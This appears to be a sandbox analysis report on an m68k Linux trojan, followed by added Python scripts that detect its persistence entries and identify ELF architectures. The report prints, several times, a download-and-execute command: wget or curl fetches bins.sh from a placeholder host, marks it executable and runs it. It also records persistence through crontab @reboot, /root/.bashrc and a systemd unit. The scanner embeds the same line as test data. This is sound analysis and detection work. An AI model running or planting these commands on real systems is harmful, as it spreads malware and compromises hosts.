Source: m68k.elf | ReversingLabs: Detection: 28%
Source: m68k.elf | String: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: m68k.elf | String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: m68k.elf | String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc
Source: .bashrc.13.dr | String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.dr | String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global traffic | TCP traffic: 192.168.2.23:42134 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.23:42124 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.23:42130 -> 8.8.8.8:53
Source: global traffic | TCP traffic: 192.168.2.23:42132 -> 8.8.8.8:53
Source: /bin/curl (PID: 6245) | Reads hosts file: /etc/hosts
Source: /tmp/m68k.elf (PID: 6224) | Socket: 127.0.0.1:4161
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 (2 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 (2 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 34.249.145.219 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (22 occurrences)
Source: global traffic | DNS traffic detected: DNS query: cdn.fwupd.org
Source: global traffic | DNS traffic detected: DNS query: host.zopz-api.com
Source: tmp.aHD8f7.22.dr | String found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.dr | String found in binary or memory: http://serverip/bins/bins.sh;
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 39282
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 39282 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample | String containing 'busybox' found: /bin/busybox
Source: Initial sample | String containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: ELF static info symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal60.troj.linELF@0/4@25/0
Source: /bin/sh (PID: 6242) | Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 6241) | Crontab executable: /usr/bin/crontab -> crontab -
Source: /tmp/m68k.elf (PID: 6226) | File written: /root/.bashrc
Source: /usr/bin/crontab (PID: 6241) | File: /var/spool/cron/crontabs/tmp.aHD8f7
Source: /usr/bin/crontab (PID: 6241) | File: /var/spool/cron/crontabs/root
Source: /tmp/m68k.elf (PID: 6226) | File: /root/.bashrc
Source: /bin/curl (PID: 6245) | Directory: /root/.curlrc
Source: /tmp/m68k.elf (PID: 6234) | Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
Source: /tmp/m68k.elf (PID: 6250) | Shell command executed: sh -c "/bin/systemctl enable bot"
Source: /bin/sh (PID: 6243) | Chmod executable: /usr/bin/chmod -> chmod +x bins.sh
Source: /bin/sh (PID: 6249) | Chmod executable: /usr/bin/chmod -> chmod +x bins.sh
Source: /usr/bin/dash (PID: 6331) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
Source: /usr/bin/dash (PID: 6332) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
Source: /bin/sh (PID: 6254) | Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot
Source: /tmp/m68k.elf (PID: 6224) | Queries kernel information via 'uname'
Source: /bin/curl (PID: 6245) | Queries kernel information via 'uname'
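The behaviour rows above record three persistence mechanisms written by the same sample: an @reboot entry piped into `crontab -` (landing in /var/spool/cron/crontabs/root), a line appended to /root/.bashrc, and a systemd unit named bot whose ExecStart carries the same command, enabled with `systemctl enable bot`. All three carry one command line that fetches bins.sh with wget or curl, runs chmod +x on it and executes it with sh. The script below is an added example, not code from the report or from the sample: it scans constructed text of a crontab listing, a shell rc file and a unit file for that fetch / chmod +x / execute chain and returns findings with the trigger and the URLs. The sample inputs are constructed here; only the dropper command line itself is taken from the report, and the other lines in the unit file and rc file are benign filler used to check that the scanner does not flag them.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# A download-and-execute chain, as the report records it, has three parts on one
# command line: a fetch tool, "chmod +x" on the fetched file, and a shell running it.
# Requiring all three keeps a lone "curl" in a dotfile from being flagged.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
CHMOD_RE = re.compile(r"\bchmod\s+\+x\b")
# "sh <file>.sh" or "bash -c", with sh/bash not glued to a preceding word or dot
# (so the "sh" at the end of "bins.sh" does not count as a shell invocation).
EXEC_RE = re.compile(r"(?<![\w.])(?:sh|bash)\s+\S+\.sh\b|(?<![\w.])bash\s+-c\b")
URL_RE = re.compile(r"https?://[^\s\"';|)]+")
# Either a @reboot/@hourly-style nickname or the five schedule fields, then the command.
CRON_LINE_RE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


@dataclass
class Finding:
    artifact: str           # which persistence store the line came from
    line_no: int
    trigger: str            # what fires the command: "@reboot", "shell rc", "ExecStart"
    urls: Tuple[str, ...]   # download URLs found on the line
    line: str


def is_download_exec_chain(cmd: str) -> bool:
    """True only when fetch, chmod +x and a shell invocation all appear in one command."""
    return bool(FETCH_RE.search(cmd) and CHMOD_RE.search(cmd) and EXEC_RE.search(cmd))


def scan_crontab(text: str, artifact: str = "crontab") -> List[Finding]:
    """Scan 'crontab -l' output or a /var/spool/cron/crontabs/<user> file."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        schedule, cmd = m.group(1).strip(), m.group(2)
        if is_download_exec_chain(cmd):
            findings.append(Finding(artifact, n, schedule, tuple(URL_RE.findall(cmd)), line))
    return findings


def scan_shell_rc(text: str, artifact: str = ".bashrc") -> List[Finding]:
    """Scan a shell startup file; every non-comment line runs at login, so each is a trigger."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line and not line.startswith("#") and is_download_exec_chain(line):
            findings.append(Finding(artifact, n, "shell rc", tuple(URL_RE.findall(line)), line))
    return findings


def scan_systemd_unit(text: str, artifact: str = "bot.service") -> List[Finding]:
    """Scan a unit file; only Exec* directives (ExecStart, ExecStartPre, ...) run commands."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        key, sep, cmd = line.partition("=")
        if sep and key.startswith("Exec") and is_download_exec_chain(cmd):
            findings.append(Finding(artifact, n, key, tuple(URL_RE.findall(cmd)), line))
    return findings


# Constructed samples (not captured from the sandbox run). DROPPER is the command line
# the report shows in the crontab, /root/.bashrc and bot.service; the surrounding lines
# are benign filler added here.
DROPPER = ('/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; '
           '/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"')

SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update",
    "@reboot " + DROPPER,
])
SAMPLE_BASHRC = "\n".join([
    "alias ll='ls -la'",
    "curl -s http://example.invalid/motd",   # a fetch on its own is not a chain
    DROPPER,
])
SAMPLE_UNIT = "\n".join([
    "[Unit]", "Description=bot", "[Service]", "ExecStart=" + DROPPER,
    "Restart=always", "[Install]", "WantedBy=multi-user.target",
])


def scan_all() -> List[Finding]:
    """Run all three scanners over the constructed samples."""
    return (scan_crontab(SAMPLE_CRONTAB) + scan_shell_rc(SAMPLE_BASHRC)
            + scan_systemd_unit(SAMPLE_UNIT))


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f.artifact}:{f.line_no} [{f.trigger}] {' '.join(f.urls)}")
```

On a live host, feed scan_crontab the contents of each file under /var/spool/cron/crontabs (the report shows root's) plus /etc/cron.d, scan_shell_rc each user's rc files, and scan_systemd_unit every unit under /etc/systemd/system and /run/systemd/system; the report records `systemctl enable bot` but not the path the unit was written to, so check both.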
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/m68k
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-m68k
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.elf
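The memory strings above (/usr/bin/qemu-m68k, /etc/qemu-binfmt/m68k, an x86_64 environment block) show the m68k sample being run on an x86_64 analysis host through qemu-user registered with binfmt_misc, and "qemu: uncaught target signal 11 (Segmentation fault) - core dumped" is the message qemu-user prints when the emulated program receives SIGSEGV. Reproducing such a run starts with reading the ELF header to pick the matching qemu-user binary. The script below is an added example, not code from the report or the sample: it decodes EI_CLASS, EI_DATA and e_machine from the first 20 bytes of an ELF header and maps them to the qemu-user binary name. The headers it parses are constructed in the code, and EM_NAMES is a subset of the ELF machine values chosen to cover the architectures IoT droppers commonly ship.

```python
import struct
from typing import Optional

# e_machine values from the ELF specification (a subset). EM_68K = 4 is the report's sample.
EM_NAMES = {
    2: "sparc", 3: "i386", 4: "m68k", 8: "mips", 20: "ppc", 21: "ppc64",
    40: "arm", 42: "sh4", 43: "sparc64", 62: "x86_64", 183: "aarch64",
}


def parse_elf_header(header: bytes) -> dict:
    """Decode class, byte order, e_type and e_machine from the first 20 bytes of an ELF file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = header[4], header[5]          # EI_CLASS: 1=32-bit 2=64-bit; EI_DATA: 1=LE 2=BE
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    # e_type and e_machine are stored in the file's own byte order, so a big-endian
    # target such as m68k must be unpacked with ">" or e_machine reads as 0x0400.
    fmt = ("<" if ei_data == 1 else ">") + "HH"
    e_type, e_machine = struct.unpack(fmt, header[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "little_endian": ei_data == 1,
        "e_type": e_type,
        "e_machine": e_machine,
        "arch": EM_NAMES.get(e_machine, f"unknown({e_machine})"),
    }


def qemu_user_binary(info: dict) -> Optional[str]:
    """Name of the qemu-user binary (as installed under /usr/bin) able to run this target."""
    name = EM_NAMES.get(info["e_machine"])
    if name is None:
        return None
    le = info["little_endian"]
    # Targets that ship separate qemu-user builds per byte order or word size.
    if name == "mips":
        base = "mips64" if info["bits"] == 64 else "mips"
        return "qemu-" + base + ("el" if le else "")
    if name == "arm":
        return "qemu-arm" if le else "qemu-armeb"
    if name == "sh4":
        return "qemu-sh4" if le else "qemu-sh4eb"
    if name == "aarch64":
        return "qemu-aarch64" if le else "qemu-aarch64_be"
    if name == "ppc64":
        return "qemu-ppc64le" if le else "qemu-ppc64"
    return "qemu-" + name


def make_header(bits: int, little_endian: bool, e_machine: int, e_type: int = 2) -> bytes:
    """Build the first 20 bytes of an ELF header (constructed test data, not a real sample)."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if little_endian else 2, 1]) + b"\x00" * 9
    fmt = ("<" if little_endian else ">") + "HH"
    return ident + struct.pack(fmt, e_type, e_machine)


def identify_file(path: str) -> dict:
    """Read a file's header and add the qemu-user binary name to the decoded fields."""
    with open(path, "rb") as fh:
        info = parse_elf_header(fh.read(20))
    info["qemu"] = qemu_user_binary(info)
    return info


if __name__ == "__main__":
    # Constructed header matching the report's sample: 32-bit, big-endian, EM_68K.
    info = parse_elf_header(make_header(32, False, 4))
    print(info["arch"], info["bits"], "LE" if info["little_endian"] else "BE", qemu_user_binary(info))
```

Run identify_file on the dropped per-architecture binaries a bins.sh-style stage pulls down to see which qemu-user packages the analysis host needs; note that uname inside the emulated process reports the emulated machine, not the x86_64 host seen in the environment block above.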